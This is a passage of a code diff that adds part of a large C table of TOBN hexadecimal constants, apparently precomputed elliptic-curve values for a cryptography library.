+     TOBN(0x03197573, 0x03955317), TOBN(0x0b4b02a9, 0xf03b4995),
+     TOBN(0x076bf559, 0x70274600), TOBN(0x32c5cc53, 0xaaf57508),
+     TOBN(0xe8af6d1f, 0x60624129), TOBN(0xb7bc5d64, 0x9a5e2b5e),
+     TOBN(0x3814b048, 0x5f082d72), TOBN(0x76f267f2, 0xce19677a),
+     TOBN(0x626c630f, 0xb36eed93), TOBN(0x55230cd7, 0x3bf56803),
+     TOBN(0x78837949, 0xce2736a0), TOBN(0x0d792d60, 0xaa6c55f1),
+     TOBN(0x0318dbfd, 0xd5c7c5d2), TOBN(0xb38f8da7, 0x072b342d),
+     TOBN(0x3569bddc, 0x7b8de38a), TOBN(0xf25b5887, 0xa1c94842),
+     TOBN(0xb2d5b284, 0x2946ad60), TOBN(0x854f29ad, 0xe9d1707e),
+     TOBN(0xaa5159dc, 0x2c6a4509), TOBN(0x899f94c0, 0x57189837),
+     TOBN(0xcf6adc51, 0xf4a55b03), TOBN(0x261762de, 0x35e3b2d5),
+     TOBN(0x4cc43012, 0x04827b51), TOBN(0xcd22a113, 0xc6021442),
+     TOBN(0xce2fd61a, 0x247c9569), TOBN(0x59a50973, 0xd152beca),
+     TOBN(0x6c835a11, 0x63a716d4), TOBN(0xc26455ed, 0x187dedcf),
+     TOBN(0x27f536e0, 0x49ce89e7), TOBN(0x18908539, 0xcc890cb5),
+     TOBN(0x308909ab, 0xd83c2aa1), TOBN(0xecd3142b, 0x1ab73bd3),
+     TOBN(0x6a85bf59, 0xb3f5ab84), TOBN(0x3c320a68, 0xf2bea4c6),
+     TOBN(0xad8dc538, 0x6da4541f), TOBN(0xeaf34eb0, 0xb7c41186),
+     TOBN(0x1c780129, 0x977c97c4), TOBN(0x5ff9beeb, 0xc57eb9fa),
+     TOBN(0xa24d0524, 0xc822c478), TOBN(0xfd8eec2a, 0x461cd415),
+     TOBN(0xfbde194e, 0xf027458c), TOBN(0xb4ff5319, 0x1d1be115),
+     TOBN(0x63f874d9, 0x4866d6f4), TOBN(0x35c75015, 0xb21ad0c9),
+     TOBN(0xa6b5c9d6, 0x46ac49d2), TOBN(0x42c77c0b, 0x83137aa9),
+     TOBN(0x24d000fc, 0x68225a38), TOBN(0x0f63cfc8, 0x2fe1e907),
+     TOBN(0x22d1b01b, 0xc6441f95), TOBN(0x7d38f719, 0xec8e448f),
+     TOBN(0x9b33fa5f, 0x787fb1ba), TOBN(0x94dcfda1, 0x190158df),
+     TOBN(0xc47cb339, 0x5f6d4a09), TOBN(0x6b4f355c, 0xee52b826),
+     TOBN(0x3d100f5d, 0xf51b930a), TOBN(0xf4512fac, 0x9f668f69),
+     TOBN(0x546781d5, 0x206c4c74), TOBN(0xd021d4d4, 0xcb4d2e48),
+     TOBN(0x494a54c2, 0xca085c2d), TOBN(0xf1dbaca4, 0x520850a8),
+     TOBN(0x63c79326, 0x490a1aca), TOBN(0xcb64dd9c, 0x41526b02),
+     TOBN(0xbb772591, 0xa2979258), TOBN(0x3f582970, 0x48d97846),
+     TOBN(0xd66b70d1, 0x7c213ba7), TOBN(0xc28febb5, 0xe8a0ced4),
+     TOBN(0x6b911831, 0xc10338c1), TOBN(0x0d54e389, 0xbf0126f3),
+     TOBN(0x7048d460, 0x4af206ee), TOBN(0x786c88f6, 0x77e97cb9),
+     TOBN(0xd4375ae1, 0xac64802e), TOBN(0x469bcfe1, 0xd53ec11c),
+     TOBN(0xfc9b340d, 0x47062230), TOBN(0xe743bb57, 0xc5b4a3ac),
+     TOBN(0xfe00b4aa, 0x59ef45ac), TOBN(0x29a4ef23, 0x59edf188),
+     TOBN(0x40242efe, 0xb483689b), TOBN(0x2575d3f6, 0x513ac262),
+     TOBN(0xf30037c8, 0x0ca6db72), TOBN(0xc9fcce82, 0x98864be2),
+     TOBN(0x84a112ff, 0x0149362d), TOBN(0x95e57582, 0x1c4ae971),
+     TOBN(0x1fa4b1a8, 0x945cf86c), TOBN(0x4525a734, 0x0b024a2f),
+     TOBN(0xe76c8b62, 0x8f338360), TOBN(0x483ff593, 0x28edf32b),
+     TOBN(0x67e8e90a, 0x298b1aec), TOBN(0x9caab338, 0x736d9a21),
+     TOBN(0x5c09d2fd, 0x66892709), TOBN(0x2496b4dc, 0xb55a1d41),
+     TOBN(0x93f5fb1a, 0xe24a4394), TOBN(0x08c75049, 0x6fa8f6c1),
+     TOBN(0xcaead1c2, 0xc905d85f), TOBN(0xe9d7f790, 0x0733ae57),
+     TOBN(0x24c9a65c, 0xf07cdd94), TOBN(0x7389359c, 0xa4b55931),
+     TOBN(0xf58709b7, 0x367e45f7), TOBN(0x1f203067, 0xcb7e7adc),
+     TOBN(0x82444bff, 0xc7b72818), TOBN(0x07303b35, 0xbaac8033),
+     TOBN(0x1e1ee4e4, 0xd13b7ea1), TOBN(0xe6489b24, 0xe0e74180),
+     TOBN(0xa5f2c610, 0x7e70ef70), TOBN(0xa1655412, 0xbdd10894),
+     TOBN(0x555ebefb, 0x7af4194e), TOBN(0x533c1c3c, 0x8e89bd9c),
+     TOBN(0x735b9b57, 0x89895856), TOBN(0x15fb3cd2, 0x567f5c15),
+     TOBN(0x057fed45, 0x526f09fd), TOBN(0xe8a4f10c, 0x8128240a),
+     TOBN(0x9332efc4, 0xff2bfd8d), TOBN(0x214e77a0, 0xbd35aa31),
+     TOBN(0x32896d73, 0x14faa40e), TOBN(0x767867ec, 0x01e5f186),
+     TOBN(0xc9adf8f1, 0x17a1813e), TOBN(0xcb6cda78, 0x54741795),
+     TOBN(0xb7521b6d, 0x349d51aa), TOBN(0xf56b5a9e, 0xe3c7b8e9),
+     TOBN(0xc6f1e5c9, 0x32a096df), TOBN(0x083667c4, 0xa3635024),
+     TOBN(0x365ea135, 0x18087f2f), TOBN(0xf1b8eaac, 0xd136e45d),
+     TOBN(0xc8a0e484, 0x73aec989), TOBN(0xd75a324b, 0x142c9259),
+     TOBN(0xb7b4d001, 0x01dae185), TOBN(0x45434e0b, 0x9b7a94bc),
+     TOBN(0xf54339af, 0xfbd8cb0b), TOBN(0xdcc4569e, 0xe98ef49e),
+     TOBN(0x7789318a, 0x09a51299), TOBN(0x81b4d206, 0xb2b025d8),
+     TOBN(0xf64aa418, 0xfae85792), TOBN(0x3e50258f, 0xacd7baf7),
+     TOBN(0xdce84cdb, 0x2996864b), TOBN(0xa2e67089, 0x1f485fa4),
+     TOBN(0xb28b2bb6, 0x534c6a5a), TOBN(0x31a7ec6b, 0xc94b9d39),
+     TOBN(0x1d217766, 0xd6bc20da), TOBN(0x4acdb5ec, 0x86761190),
+     TOBN(0x68726328, 0x73701063), TOBN(0x4d24ee7c, 0x2128c29b),
+     TOBN(0xc072ebd3, 0xa19fd868), TOBN(0x612e481c, 0xdb8ddd3b),
+     TOBN(0xb4e1d754, 0x1a64d852), TOBN(0x00ef95ac, 0xc4c6c4ab),
+     TOBN(0x1536d2ed, 0xaa0a6c46), TOBN(0x61294086, 0x43774790),
+     TOBN(0x54af25e8, 0x343fda10), TOBN(0x9ff9d98d, 0xfd25d6f2),
+     TOBN(0x0746af7c, 0x468b8835), TOBN(0x977a31cb, 0x730ecea7),
+     TOBN(0xa5096b80, 0xc2cf4a81), TOBN(0xaa986833, 0x6458c37a),
+     TOBN(0x6af29bf3, 0xa6bd9d34), TOBN(0x6a62fe9b, 0x33c5d854),
+     TOBN(0x50e6c304, 0xb7133b5e), TOBN(0x04b60159, 0x7d6e6848),
+     TOBN(0x4cd296df, 0x5579bea4), TOBN(0x10e35ac8, 0x5ceedaf1),
+     TOBN(0x04c4c5fd, 0xe3bcc5b1), TOBN(0x95f9ee8a, 0x89412cf9),
+     TOBN(0x2c9459ee, 0x82b6eb0f), TOBN(0x2e845765, 0x95c2aadd),
+     TOBN(0x774a84ae, 0xd327fcfe), TOBN(0xd8c93722, 0x0368d476),
+     TOBN(0x0dbd5748, 0xf83e8a3b), TOBN(0xa579aa96, 0x8d2495f3),
+     TOBN(0x535996a0, 0xae496e9b), TOBN(0x07afbfe9, 0xb7f9bcc2),
+     TOBN(0x3ac1dc6d, 0x5b7bd293), TOBN(0x3b592cff, 0x7022323d),
+     TOBN(0xba0deb98, 0x9c0a3e76), TOBN(0x18e78e9f, 0x4b197acb),
+     TOBN(0x211cde10, 0x296c36ef), TOBN(0x7ee89672, 0x82c4da77),
+     TOBN(0xb617d270, 0xa57836da), TOBN(0xf0cd9c31, 0x9cb7560b),
+     TOBN(0x01fdcbf7, 0xe455fe90), TOBN(0x3fb53cbb, 0x7e7334f3),
+     TOBN(0x781e2ea4, 0x4e7de4ec), TOBN(0x8adab3ad, 0x0b384fd0),
+     TOBN(0x129eee2f, 0x53d64829), TOBN(0x7a471e17, 0xa261492b),
+     TOBN(0xe4f9adb9, 0xe4cb4a2c), TOBN(0x3d359f6f, 0x97ba2c2d),
+     TOBN(0x346c6786, 0x0aacd697), TOBN(0x92b444c3, 0x75c2f8a8),
+     TOBN(0xc79fa117, 0xd85df44e), TOBN(0x56782372, 0x398ddf31),
+     TOBN(0x60e690f2, 0xbbbab3b8), TOBN(0x4851f8ae, 0x8b04816b),
+     TOBN(0xc72046ab, 0x9c92e4d2), TOBN(0x518c74a1, 0x7cf3136b),
+     TOBN(0xff4eb50a, 0xf9877d4c), TOBN(0x14578d90, 0xa919cabb),
+     TOBN(0x8218f8c4, 0xac5eb2b6), TOBN(0xa3ccc547, 0x542016e4),
+     TOBN(0x025bf48e, 0x327f8349), TOBN(0xf3e97346, 0xf43cb641),
+     TOBN(0xdc2bafdf, 0x500f1085), TOBN(0x57167876, 0x2f063055),
+     TOBN(0x5bd914b9, 0x411925a6), TOBN(0x7c078d48, 0xa1123de5),
+     TOBN(0xee6bf835, 0x182b165d), TOBN(0xb11b5e5b, 0xba519727),
+     TOBN(0xe33ea76c, 0x1eea7b85), TOBN(0x2352b461, 0x92d4f85e),
+     TOBN(0xf101d334, 0xafe115bb), TOBN(0xfabc1294, 0x889175a3),
+     TOBN(0x7f6bcdc0, 0x5233f925), TOBN(0xe0a802db, 0xe77fec55),
+     TOBN(0xbdb47b75, 0x8069b659), TOBN(0x1c5e12de, 0xf98fbd74),
+     TOBN(0x869c58c6, 0x4b8457ee), TOBN(0xa5360f69, 0x4f7ea9f7),
+     TOBN(0xe576c09f, 0xf460b38f), TOBN(0x6b70d548, 0x22b7fb36),
+     TOBN(0x3fd237f1, 0x3bfae315), TOBN(0x33797852, 0xcbdff369),
+     TOBN(0x97df25f5, 0x25b516f9), TOBN(0x46f388f2, 0xba38ad2d),
+     TOBN(0x656c4658, 0x89d8ddbb), TOBN(0x8830b26e, 0x70f38ee8),
+     TOBN(0x4320fd5c, 0xde1212b0), TOBN(0xc34f30cf, 0xe4a2edb2),
+     TOBN(0xabb131a3, 0x56ab64b8), TOBN(0x7f77f0cc, 0xd99c5d26),
+     TOBN(0x66856a37, 0xbf981d94), TOBN(0x19e76d09, 0x738bd76e),
+     TOBN(0xe76c8ac3, 0x96238f39), TOBN(0xc0a482be, 0xa830b366),
+     TOBN(0xb7b8eaff, 0x0b4eb499), TOBN(0x8ecd83bc, 0x4bfb4865),
+     TOBN(0x971b2cb7, 0xa2f3776f), TOBN(0xb42176a4, 0xf4b88adf),
+     TOBN(0xb9617df5, 0xbe1fa446), TOBN(0x8b32d508, 0xcd031bd2),
+     TOBN(0x1c6bd47d, 0x53b618c0), TOBN(0xc424f46c, 0x6a227923),
+     TOBN(0x7303ffde, 0xdd92d964), TOBN(0xe9712878, 0x71b5abf2),
+     TOBN(0x8f48a632, 0xf815561d), TOBN(0x85f48ff5, 0xd3c055d1),
+     TOBN(0x222a1427, 0x7525684f), TOBN(0xd0d841a0, 0x67360cc3),
+     TOBN(0x4245a926, 0x0b9267c6), TOBN(0xc78913f1, 0xcf07f863),
+     TOBN(0xaa844c8e, 0x4d0d9e24), TOBN(0xa42ad522, 0x3d5f9017),
+     TOBN(0xbd371749, 0xa2c989d5), TOBN(0x928292df, 0xe1f5e78e),
+     TOBN(0x493b383e, 0x0a1ea6da), TOBN(0x5136fd8d, 0x13aee529),
+     TOBN(0x860c44b1, 0xf2c34a99), TOBN(0x3b00aca4, 0xbf5855ac),
+     TOBN(0xabf6aaa0, 0xfaaf37be), TOBN(0x65f43682, 0x2a53ec08),
+     TOBN(0x1d9a5801, 0xa11b12e1), TOBN(0x78a7ab2c, 0xe20ed475),
+     TOBN(0x0de1067e, 0x9a41e0d5), TOBN(0x30473f5f, 0x305023ea),
+     TOBN(0xdd3ae09d, 0x169c7d97), TOBN(0x5cd5baa4, 0xcfaef9cd),
+     TOBN(0x5cd7440b, 0x65a44803), TOBN(0xdc13966a, 0x47f364de),
+     TOBN(0x077b2be8, 0x2b8357c1), TOBN(0x0cb1b4c5, 0xe9d57c2a),
+     TOBN(0x7a4ceb32, 0x05ff363e), TOBN(0xf310fa4d, 0xca35a9ef),
+     TOBN(0xdbb7b352, 0xf97f68c6), TOBN(0x0c773b50, 0x0b02cf58),
+     TOBN(0xea2e4821, 0x3c1f96d9), TOBN(0xffb357b0, 0xeee01815),
+     TOBN(0xb9c924cd, 0xe0f28039), TOBN(0x0b36c95a, 0x46a3fbe4),
+     TOBN(0x1faaaea4, 0x5e46db6c), TOBN(0xcae575c3, 0x1928aaff),
+     TOBN(0x7f671302, 0xa70dab86), TOBN(0xfcbd12a9, 0x71c58cfc),
+     TOBN(0xcbef9acf, 0xbee0cb92), TOBN(0x573da0b9, 0xf8c1b583),
+     TOBN(0x4752fcfe, 0x0d41d550), TOBN(0xe7eec0e3, 0x2155cffe),
+     TOBN(0x0fc39fcb, 0x545ae248), TOBN(0x522cb8d1, 0x8065f44e),
+     TOBN(0x263c962a, 0x70cbb96c), TOBN(0xe034362a, 0xbcd124a9),
+     TOBN(0xf120db28, 0x3c2ae58d), TOBN(0xb9a38d49, 0xfef6d507),
+     TOBN(0xb1fd2a82, 0x1ff140fd), TOBN(0xbd162f30, 0x20aee7e0),
+     TOBN(0x4e17a5d4, 0xcb251949), TOBN(0x2aebcb83, 0x4f7e1c3d),
+     TOBN(0x608eb25f, 0x937b0527), TOBN(0xf42e1e47, 0xeb7d9997),
+     TOBN(0xeba699c4, 0xb8a53a29), TOBN(0x1f921c71, 0xe091b536),
+     TOBN(0xcce29e7b, 0x5b26bbd5), TOBN(0x7a8ef5ed, 0x3b61a680),
+     TOBN(0xe5ef8043, 0xba1f1c7e), TOBN(0x16ea8217, 0x18158dda),
+     TOBN(0x01778a2b, 0x599ff0f9), TOBN(0x68a923d7, 0x8104fc6b),
+     TOBN(0x5bfa44df, 0xda694ff3), TOBN(0x4f7199db, 0xf7667f12),
+     TOBN(0xc06d8ff6, 0xe46f2a79), TOBN(0x08b5dead, 0xe9f8131d),
+     TOBN(0x02519a59, 0xabb4ce7c), TOBN(0xc4f710bc, 0xb42aec3e),
+     TOBN(0x3d77b057, 0x78bde41a), TOBN(0x6474bf80, 0xb4186b5a),
+     TOBN(0x048b3f67, 0x88c65741), TOBN(0xc64519de, 0x03c7c154),
+     TOBN(0xdf073846, 0x0edfcc4f), TOBN(0x319aa737, 0x48f1aa6b),
+     TOBN(0x8b9f8a02, 0xca909f77), TOBN(0x90258139, 0x7580bfef),
+     TOBN(0xd8bfd3ca, 0xc0c22719), TOBN(0xc60209e4, 0xc9ca151e),
+     TOBN(0x7a744ab5, 0xd9a1a69c), TOBN(0x6de5048b, 0x14937f8f),
+     TOBN(0x171938d8, 0xe115ac04), TOBN(0x7df70940, 0x1c6b16d2),
+     TOBN(0xa6aeb663, 0x7f8e94e7), TOBN(0xc130388e, 0x2a2cf094),
+     TOBN(0x1850be84, 0x77f54e6e), TOBN(0x9f258a72, 0x65d60fe5),
+     TOBN(0xff7ff0c0, 0x6c9146d6), TOBN(0x039aaf90, 0xe63a830b),
+     TOBN(0x38f27a73, 0x9460342f), TOBN(0x4703148c, 0x3f795f8a),
+     TOBN(0x1bb5467b, 0x9681a97e), TOBN(0x00931ba5, 0xecaeb594),
+     TOBN(0xcdb6719d, 0x786f337c), TOBN(0xd9c01cd2, 0xe704397d),
+     TOBN(0x0f4a3f20, 0x555c2fef), TOBN(0x00452509, 0x7c0af223),
+     TOBN(0x54a58047, 0x84db8e76), TOBN(0x3bacf1aa, 0x93c8aa06),
+     TOBN(0x11ca957c, 0xf7919422), TOBN(0x50641053, 0x78cdaa40),
+     TOBN(0x7a303874, 0x9f7144ae), TOBN(0x170c963f, 0x43d4acfd),
+     TOBN(0x5e148149, 0x58ddd3ef), TOBN(0xa7bde582, 0x9e72dba8),
+     TOBN(0x0769da8b, 0x6fa68750), TOBN(0xfa64e532, 0x572e0249),
+     TOBN(0xfcaadf9d, 0x2619ad31), TOBN(0x87882daa, 0xa7b349cd),
+     TOBN(0x9f6eb731, 0x6c67a775), TOBN(0xcb10471a, 0xefc5d0b1),
+     TOBN(0xb433750c, 0xe1b806b2), TOBN(0x19c5714d, 0x57b1ae7e),
+     TOBN(0xc0dc8b7b, 0xed03fd3f), TOBN(0xdd03344f, 0x31bc194e),
+     TOBN(0xa66c52a7, 0x8c6320b5), TOBN(0x8bc82ce3, 0xd0b6fd93),
+     TOBN(0xf8e13501, 0xb35f1341), TOBN(0xe53156dd, 0x25a43e42),
+     TOBN(0xd3adf27e, 0x4daeb85c), TOBN(0xb81d8379, 0xbbeddeb5),
+     TOBN(0x1b0b546e, 0x2e435867), TOBN(0x9020eb94, 0xeba5dd60),
+     TOBN(0x37d91161, 0x8210cb9d), TOBN(0x4c596b31, 0x5c91f1cf),
+     TOBN(0xb228a90f, 0x0e0b040d), TOBN(0xbaf02d82, 0x45ff897f),
+     TOBN(0x2aac79e6, 0x00fa6122), TOBN(0x24828817, 0x8e36f557),
+     TOBN(0xb9521d31, 0x113ec356), TOBN(0x9e48861e, 0x15eff1f8),
+     TOBN(0x2aa1d412, 0xe0d41715), TOBN(0x71f86203, 0x53f131b8),
+     TOBN(0xf60da8da, 0x3fd19408), TOBN(0x4aa716dc, 0x278d9d99),
+     TOBN(0x394531f7, 0xa8c51c90), TOBN(0xb560b0e8, 0xf59db51c),
+     TOBN(0xa28fc992, 0xfa34bdad), TOBN(0xf024fa14, 0x9cd4f8bd),
+     TOBN(0x5cf530f7, 0x23a9d0d3), TOBN(0x615ca193, 0xe28c9b56),
+     TOBN(0x6d2a483d, 0x6f73c51e), TOBN(0xa4cb2412, 0xea0dc2dd),
+     TOBN(0x50663c41, 0x1eb917ff), TOBN(0x3d3a74cf, 0xeade299e),
+     TOBN(0x29b3990f, 0x4a7a9202), TOBN(0xa9bccf59, 0xa7b15c3d),
+     TOBN(0x66a3ccdc, 0xa5df9208), TOBN(0x48027c14, 0x43f2f929),
+     TOBN(0xd385377c, 0x40b557f0), TOBN(0xe001c366, 0xcd684660),
+     TOBN(0x1b18ed6b, 0xe2183a27), TOBN(0x879738d8, 0x63210329),
+     TOBN(0xa687c74b, 0xbda94882), TOBN(0xd1bbcc48, 0xa684b299),
+     TOBN(0xaf6f1112, 0x863b3724), TOBN(0x6943d1b4, 0x2c8ce9f8),
+     TOBN(0xe044a3bb, 0x098cafb4), TOBN(0x27ed2310, 0x60d48caf),
+     TOBN(0x542b5675, 0x3a31b84d), TOBN(0xcbf3dd50, 0xfcddbed7),
+     TOBN(0x25031f16, 0x41b1d830), TOBN(0xa7ec851d, 0xcb0c1e27),
+     TOBN(0xac1c8fe0, 0xb5ae75db), TOBN(0xb24c7557, 0x08c52120),
+     TOBN(0x57f811dc, 0x1d4636c3), TOBN(0xf8436526, 0x681a9939),
+     TOBN(0x1f6bc6d9, 0x9c81adb3), TOBN(0x840f8ac3, 0x5b7d80d4),
+     TOBN(0x731a9811, 0xf4387f1a), TOBN(0x7c501cd3, 0xb5156880),
+     TOBN(0xa5ca4a07, 0xdfe68867), TOBN(0xf123d8f0, 0x5fcea120),
+     TOBN(0x1fbb0e71, 0xd607039e), TOBN(0x2b70e215, 0xcd3a4546),
+     TOBN(0x32d2f01d, 0x53324091), TOBN(0xb796ff08, 0x180ab19b),
+     TOBN(0x32d87a86, 0x3c57c4aa), TOBN(0x2aed9caf, 0xb7c49a27),
+     TOBN(0x9fb35eac, 0x31630d98), TOBN(0x338e8cdf, 0x5c3e20a3),
+     TOBN(0x80f16182, 0x66cde8db), TOBN(0x4e159980, 0x2d72fd36),
+     TOBN(0xd7b8f13b, 0x9b6e5072), TOBN(0xf5213907, 0x3b7b5dc1),
+     TOBN(0x4d431f1d, 0x8ce4396e), TOBN(0x37a1a680, 0xa7ed2142),
+     TOBN(0xbf375696, 0xd01aaf6b), TOBN(0xaa1c0c54, 0xe63aab66),
+     TOBN(0x3014368b, 0x4ed80940), TOBN(0x67e6d056, 0x7a6fcedd),
+     TOBN(0x7c208c49, 0xca97579f), TOBN(0xfe3d7a81, 0xa23597f6),
+     TOBN(0x5e203202, 0x7e096ae2), TOBN(0xb1f3e1e7, 0x24b39366),
+     TOBN(0x26da26f3, 0x2fdcdffc), TOBN(0x79422f1d, 0x6097be83),}
+    ,
+    {TOBN(0x263a2cfb, 0x9db3b381), TOBN(0x9c3a2dee, 0xd4df0a4b),
+     TOBN(0x728d06e9, 0x7d04e61f), TOBN(0x8b1adfbc, 0x42449325),
+     TOBN(0x6ec1d939, 0x7e053a1b), TOBN(0xee2be5c7, 0x66daf707),
+     TOBN(0x80ba1e14, 0x810ac7ab), TOBN(0xdd2ae778, 0xf530f174),
+     TOBN(0x0435d97a, 0x205b9d8b), TOBN(0x6eb8f064, 0x056756d4),
+     TOBN(0xd5e88a8b, 0xb6f8210e), TOBN(0x070ef12d, 0xec9fd9ea),
+     TOBN(0x4d849505, 0x3bcc876a), TOBN(0x12a75338, 0xa7404ce3),
+     TOBN(0xd22b49e1, 0xb8a1db5e), TOBN(0xec1f2051, 0x14bfa5ad),
+     TOBN(0xadbaeb79, 0xb6828f36), TOBN(0x9d7a0258, 0x01bd5b9e),
+     TOBN(0xeda01e0d, 0x1e844b0c), TOBN(0x4b625175, 0x887edfc9),
+     TOBN(0x14109fdd, 0x9669b621), TOBN(0x88a2ca56, 0xf6f87b98),
+     TOBN(0xfe2eb788, 0x170df6bc), TOBN(0x0cea06f4, 0xffa473f9),
+     TOBN(0x43ed81b5, 0xc4e83d33), TOBN(0xd9f35879, 0x5efd488b),
+     TOBN(0x164a620f, 0x9deb4d0f), TOBN(0xc6927bdb, 0xac6a7394),
+     TOBN(0x45c28df7, 0x9f9e0f03), TOBN(0x2868661e, 0xfcd7e1a9),
+     TOBN(0x7cf4e8d0, 0xffa348f1), TOBN(0x6bd4c284, 0x398538e0),
+     TOBN(0x2618a091, 0x289a8619), TOBN(0xef796e60, 0x6671b173),
+     TOBN(0x664e46e5, 0x9090c632), TOBN(0xa38062d4, 0x1e66f8fb),
+     TOBN(0x6c744a20, 0x0573274e), TOBN(0xd07b67e4, 0xa9271394),
+     TOBN(0x391223b2, 0x6bdc0e20), TOBN(0xbe2d93f1, 0xeb0a05a7),
+     TOBN(0xf23e2e53, 0x3f36d141), TOBN(0xe84bb3d4, 0x4dfca442),
+     TOBN(0xb804a48d, 0x6b7c023a), TOBN(0x1e16a8fa, 0x76431c3b),
+     TOBN(0x1b5452ad, 0xddd472e0), TOBN(0x7d405ee7, 0x0d1ee127),
+     TOBN(0x50fc6f1d, 0xffa27599), TOBN(0x351ac53c, 0xbf391b35),
+     TOBN(0x7efa14b8, 0x4444896b), TOBN(0x64974d2f, 0xf94027fb),
+     TOBN(0xefdcd0e8, 0xde84487d), TOBN(0x8c45b260, 0x2b48989b),
+     TOBN(0xa8fcbbc2, 0xd8463487), TOBN(0xd1b2b3f7, 0x3fbc476c),
+     TOBN(0x21d005b7, 0xc8f443c0), TOBN(0x518f2e67, 0x40c0139c),
+     TOBN(0x56036e8c, 0x06d75fc1), TOBN(0x2dcf7bb7, 0x3249a89f),
+     TOBN(0x81dd1d3d, 0xe245e7dd), TOBN(0xf578dc4b, 0xebd6e2a7),
+     TOBN(0x4c028903, 0xdf2ce7a0), TOBN(0xaee36288, 0x9c39afac),
+     TOBN(0xdc847c31, 0x146404ab), TOBN(0x6304c0d8, 0xa4e97818),
+     TOBN(0xae51dca2, 0xa91f6791), TOBN(0x2abe4190, 0x9baa9efc),
+     TOBN(0xd9d2e2f4, 0x559c7ac1), TOBN(0xe82f4b51, 0xfc9f773a),
+     TOBN(0xa7713027, 0x4073e81c), TOBN(0xc0276fac, 0xfbb596fc),
+     TOBN(0x1d819fc9, 0xa684f70c), TOBN(0x29b47fdd, 0xc9f7b1e0),
+     TOBN(0x358de103, 0x459b1940), TOBN(0xec881c59, 0x5b013e93),
+     TOBN(0x51574c93, 0x49532ad3), TOBN(0x2db1d445, 0xb37b46de),
+     TOBN(0xc6445b87, 0xdf239fd8), TOBN(0xc718af75, 0x151d24ee),
+     TOBN(0xaea1c4a4, 0xf43c6259), TOBN(0x40c0e5d7, 0x70be02f7),
+     TOBN(0x6a4590f4, 0x721b33f2), TOBN(0x2124f1fb, 0xfedf04ea),
+     TOBN(0xf8e53cde, 0x9745efe7), TOBN(0xe7e10432, 0x65f046d9),
+     TOBN(0xc3fca28e, 0xe4d0c7e6), TOBN(0x847e339a, 0x87253b1b),
+     TOBN(0x9b595348, 0x3743e643), TOBN(0xcb6a0a0b, 0x4fd12fc5),
+     TOBN(0xfb6836c3, 0x27d02dcc), TOBN(0x5ad00982, 0x7a68bcc2),
+     TOBN(0x1b24b44c, 0x005e912d), TOBN(0xcc83d20f, 0x811fdcfe),
+     TOBN(0x36527ec1, 0x666fba0c), TOBN(0x69948197, 0x14754635),
+     TOBN(0xfcdcb1a8, 0x556da9c2), TOBN(0xa5934267, 0x81a732b2),
+     TOBN(0xec1214ed, 0xa714181d), TOBN(0x609ac13b, 0x6067b341),
+     TOBN(0xff4b4c97, 0xa545df1f), TOBN(0xa1240501, 0x34d2076b),
+     TOBN(0x6efa0c23, 0x1409ca97), TOBN(0x254cc1a8, 0x20638c43),
+     TOBN(0xd4e363af, 0xdcfb46cd), TOBN(0x62c2adc3, 0x03942a27),
+     TOBN(0xc67b9df0, 0x56e46483), TOBN(0xa55abb20, 0x63736356),
+     TOBN(0xab93c098, 0xc551bc52), TOBN(0x382b49f9, 0xb15fe64b),
+     TOBN(0x9ec221ad, 0x4dff8d47), TOBN(0x79caf615, 0x437df4d6),
+     TOBN(0x5f13dc64, 0xbb456509), TOBN(0xe4c589d9, 0x191f0714),
+     TOBN(0x27b6a8ab, 0x3fd40e09), TOBN(0xe455842e, 0x77313ea9),
+     TOBN(0x8b51d1e2, 0x1f55988b), TOBN(0x5716dd73, 0x062bbbfc),
+     TOBN(0x633c11e5, 0x4e8bf3de), TOBN(0x9a0e77b6, 0x1b85be3b),
+     TOBN(0x56510729, 0x0911cca6), TOBN(0x27e76495, 0xefa6590f),
+     TOBN(0xe4ac8b33, 0x070d3aab), TOBN(0x2643672b, 0x9a2cd5e5),
+     TOBN(0x52eff79b, 0x1cfc9173), TOBN(0x665ca49b, 0x90a7c13f),
+     TOBN(0x5a8dda59, 0xb3efb998), TOBN(0x8a5b922d, 0x052f1341),
+     TOBN(0xae9ebbab, 0x3cf9a530), TOBN(0x35986e7b, 0xf56da4d7),
+     TOBN(0x3a636b5c, 0xff3513cc), TOBN(0xbb0cf8ba, 0x3198f7dd),
+     TOBN(0xb8d40522, 0x41f16f86), TOBN(0x760575d8, 0xde13a7bf),
+     TOBN(0x36f74e16, 0x9f7aa181), TOBN(0x163a3ecf, 0xf509ed1c),
+     TOBN(0x6aead61f, 0x3c40a491), TOBN(0x158c95fc, 0xdfe8fcaa),
+     TOBN(0xa3991b6e, 0x13cda46f), TOBN(0x79482415, 0x342faed0),
+     TOBN(0xf3ba5bde, 0x666b5970), TOBN(0x1d52e6bc, 0xb26ab6dd),
+     TOBN(0x768ba1e7, 0x8608dd3d), TOBN(0x4930db2a, 0xea076586),
+     TOBN(0xd9575714, 0xe7dc1afa), TOBN(0x1fc7bf7d, 0xf7c58817),
+     TOBN(0x6b47accd, 0xd9eee96c), TOBN(0x0ca277fb, 0xe58cec37),
+     TOBN(0x113fe413, 0xe702c42a), TOBN(0xdd1764ee, 0xc47cbe51),
+     TOBN(0x041e7cde, 0x7b3ed739), TOBN(0x50cb7459, 0x5ce9e1c0),
+     TOBN(0x35568513, 0x2925b212), TOBN(0x7cff95c4, 0x001b081c),
+     TOBN(0x63ee4cbd, 0x8088b454), TOBN(0xdb7f32f7, 0x9a9e0c8a),
+     TOBN(0xb377d418, 0x6b2447cb), TOBN(0xe3e982aa, 0xd370219b),
+     TOBN(0x06ccc1e4, 0xc2a2a593), TOBN(0x72c36865, 0x0773f24f),
+     TOBN(0xa13b4da7, 0x95859423), TOBN(0x8bbf1d33, 0x75040c8f),
+     TOBN(0x726f0973, 0xda50c991), TOBN(0x48afcd5b, 0x822d6ee2),
+     TOBN(0xe5fc718b, 0x20fd7771), TOBN(0xb9e8e77d, 0xfd0807a1),
+     TOBN(0x7f5e0f44, 0x99a7703d), TOBN(0x6972930e, 0x618e36f3),
+     TOBN(0x2b7c77b8, 0x23807bbe), TOBN(0xe5b82405, 0xcb27ff50),
+     TOBN(0xba8b8be3, 0xbd379062), TOBN(0xd64b7a1d, 0x2dce4a92),
+     TOBN(0x040a73c5, 0xb2952e37), TOBN(0x0a9e252e, 0xd438aeca),
+     TOBN(0xdd43956b, 0xc39d3bcb), TOBN(0x1a31ca00, 0xb32b2d63),
+     TOBN(0xd67133b8, 0x5c417a18), TOBN(0xd08e4790, 0x2ef442c8),
+     TOBN(0x98cb1ae9, 0x255c0980), TOBN(0x4bd86381, 0x2b4a739f),
